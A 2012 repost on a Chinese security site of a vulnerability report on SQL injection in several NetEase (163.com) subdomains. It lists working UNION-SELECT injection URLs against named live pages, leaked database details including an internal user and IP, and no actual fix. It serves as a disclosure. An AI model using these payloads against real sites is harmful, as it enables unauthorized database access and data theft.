频道栏目
首页 > 安全 > 网站安全 > 正文

网易某分站多些SQL注射漏洞及修复

2012-03-25 13:10:05           
收藏   我要投稿
简要描述:注射可导致主机相关信息泄露,以及进一步的渗透。望管理员及时修复,以免造成对主机安全影响。
详细说明:http://rainbowlife.163.com/chxw2.php?articleID=98%27%20%20%20And%201=2%20UNION%20all%20SELECT%201,2,3,4,5,6,7%20--+a
漏洞证明:
Os:pc-linux-gnu
Ver:4.0.26-log
Port:3306
User:minisite@10.100.50.23
Base:minisite2007
 
1、
 
http://rainbowlife.163.com/chxw2.php?articleID=98%27%20%20%20And%201=2%20UNION%20all%20SELECT%201,2,3,4,5,6,7%20--+a
 
2、http://rainbowlife.163.com/chsht2.php?articleID=90' And 1=2 UNION all SELECT 1,2,3,4,5,6,7 --+a
泄露错误信息:
 
3、http://cards.mail.163.com/cards/mviewcard.do
?id=77811'
&code=null
&key=null
修复方案:
 
你懂的。
 
作者 孤狐浪子
相关TAG标签 网易 漏洞 分站
上一篇:Timthumb缩略图插件漏洞简介与演示
下一篇:蚂蜂窝手机应用背后的HTTP API接口存在SQL注入漏洞及修复
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站